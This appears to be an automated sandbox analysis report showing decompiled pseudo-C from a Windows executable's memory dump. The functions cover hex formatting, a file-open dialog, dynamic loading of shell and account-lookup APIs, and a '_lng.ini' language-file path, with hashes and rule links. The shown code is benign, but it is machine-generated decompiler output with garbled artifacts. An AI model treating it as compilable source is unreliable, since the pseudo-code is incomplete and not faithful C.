                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                0x00401676
                                                                                                                0x0040167e
                                                                                                                0x0040168a
                                                                                                                0x0040168c
                                                                                                                0x00401690
                                                                                                                0x00401691
                                                                                                                0x00401696
                                                                                                                0x0040169d
                                                                                                                0x004016a2
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016ad
                                                                                                                0x004016ae
                                                                                                                0x004016b3
                                                                                                                0x004016b9
                                                                                                                0x004016bb
                                                                                                                0x004016bc
                                                                                                                0x004016c1
                                                                                                                0x004016c8
                                                                                                                0x004016cd
                                                                                                                0x004016ce
                                                                                                                0x004016ea
                                                                                                                0x004016ff
                                                                                                                0x0040170c
                                                                                                                0x004016d0
                                                                                                                0x004016e3
                                                                                                                0x004016e3
                                                                                                                0x00401711
                                                                                                                0x00401714
                                                                                                                0x00000000
                                                                                                                0x00401719
                                                                                                                0x0040171c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                0x00405132
                                                                                                                0x00405135
                                                                                                                0x00405139
                                                                                                                0x0040513e
                                                                                                                0x00405141
                                                                                                                0x004051b3
                                                                                                                0x00405143
                                                                                                                0x00405145
                                                                                                                0x00405147
                                                                                                                0x0040514c
                                                                                                                0x0040514e
                                                                                                                0x00405151
                                                                                                                0x00405151
                                                                                                                0x0040515b
                                                                                                                0x0040515c
                                                                                                                0x0040515d
                                                                                                                0x0040515e
                                                                                                                0x0040515f
                                                                                                                0x00405168
                                                                                                                0x00405169
                                                                                                                0x00405171
                                                                                                                0x00405173
                                                                                                                0x00405174
                                                                                                                0x00405182
                                                                                                                0x00405184
                                                                                                                0x00405189
                                                                                                                0x0040518c
                                                                                                                0x00405194
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405196
                                                                                                                0x0040519a
                                                                                                                0x0040519b
                                                                                                                0x004051a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004051a1
                                                                                                                0x004051a3
                                                                                                                0x004051a3
                                                                                                                0x004051a6
                                                                                                                0x004051af
                                                                                                                0x004051b0
                                                                                                                0x004051b7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                0x004075bb
                                                                                                                0x004075c2
                                                                                                                0x004075c7
                                                                                                                0x004075ca
                                                                                                                0x004075cd
                                                                                                                0x004075d8
                                                                                                                0x004075e9
                                                                                                                0x004075fc
                                                                                                                0x00407600
                                                                                                                0x00407601
                                                                                                                0x00407606
                                                                                                                0x00407609
                                                                                                                0x0040760e
                                                                                                                0x00407619
                                                                                                                0x0040761e
                                                                                                                0x0040761f
                                                                                                                0x00407624
                                                                                                                0x00407636

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                0x00405080
                                                                                                                0x00405086
                                                                                                                0x0040508b
                                                                                                                0x0040508e
                                                                                                                0x00405091
                                                                                                                0x00405097
                                                                                                                0x0040509d
                                                                                                                0x004050a4
                                                                                                                0x004050ab
                                                                                                                0x004050b2
                                                                                                                0x004050b5
                                                                                                                0x004050bc
                                                                                                                0x004050cb
                                                                                                                0x004050e0
                                                                                                                0x004050cd
                                                                                                                0x004050d1
                                                                                                                0x004050dc
                                                                                                                0x004050dc

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                0x00409072
                                                                                                                0x00409074
                                                                                                                0x0040907d
                                                                                                                0x00409086
                                                                                                                0x0040908e
                                                                                                                0x004090a5
                                                                                                                0x004090a5
                                                                                                                0x0040908e
                                                                                                                0x004090ac

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                0x0040ad8c
                                                                                                                0x0040ad93
                                                                                                                0x0040ad95
                                                                                                                0x0040ad9d
                                                                                                                0x0040ada5
                                                                                                                0x0040adb2
                                                                                                                0x0040adb2
                                                                                                                0x0040adb5
                                                                                                                0x0040adbf

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                0x00406597
                                                                                                                0x00406598
                                                                                                                0x004065a0
                                                                                                                0x004065aa
                                                                                                                0x004065ac
                                                                                                                0x004065ac
                                                                                                                0x004065bd

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                0x0040ac59
                                                                                                                0x0040ac60
                                                                                                                0x0040ac68
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac75
                                                                                                                0x0040ac7b
                                                                                                                0x00000000
                                                                                                                0x0040ac7b
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac80

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                0x00406670
                                                                                                                0x0040667a
                                                                                                                0x00406680
                                                                                                                0x00406686
                                                                                                                0x0040668b
                                                                                                                0x0040668d
                                                                                                                0x00406693
                                                                                                                0x00406699
                                                                                                                0x0040669f
                                                                                                                0x004066a9
                                                                                                                0x004066ac
                                                                                                                0x004066af
                                                                                                                0x004066b9
                                                                                                                0x004066c7
                                                                                                                0x004066d9
                                                                                                                0x004066c9
                                                                                                                0x004066c9
                                                                                                                0x004066cc
                                                                                                                0x004066cf
                                                                                                                0x004066d2
                                                                                                                0x004066d5
                                                                                                                0x004066d5
                                                                                                                0x004066db
                                                                                                                0x004066dd
                                                                                                                0x004066e0
                                                                                                                0x004066e8
                                                                                                                0x004066fa
                                                                                                                0x004066ea
                                                                                                                0x004066ea
                                                                                                                0x004066ed
                                                                                                                0x004066f0
                                                                                                                0x004066f3
                                                                                                                0x004066f6
                                                                                                                0x004066f6
                                                                                                                0x004066fc
                                                                                                                0x004066fe
                                                                                                                0x00406701
                                                                                                                0x00406709
                                                                                                                0x0040671b
                                                                                                                0x0040670b
                                                                                                                0x0040670b
                                                                                                                0x0040670e
                                                                                                                0x00406711
                                                                                                                0x00406714
                                                                                                                0x00406717
                                                                                                                0x00406717
                                                                                                                0x0040671d
                                                                                                                0x0040671f
                                                                                                                0x00406722
                                                                                                                0x0040672a
                                                                                                                0x0040673c
                                                                                                                0x0040672c
                                                                                                                0x0040672c
                                                                                                                0x0040672f
                                                                                                                0x00406732
                                                                                                                0x00406735
                                                                                                                0x00406738
                                                                                                                0x00406738
                                                                                                                0x0040673f
                                                                                                                0x00406745

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                0x004054ea
                                                                                                                0x004054ec
                                                                                                                0x004054f1
                                                                                                                0x004054f4
                                                                                                                0x004054f7
                                                                                                                0x004054fa
                                                                                                                0x004054fe
                                                                                                                0x00405501
                                                                                                                0x00405505
                                                                                                                0x00405508
                                                                                                                0x0040550b
                                                                                                                0x0040551b
                                                                                                                0x0040550d
                                                                                                                0x0040550f
                                                                                                                0x0040550f
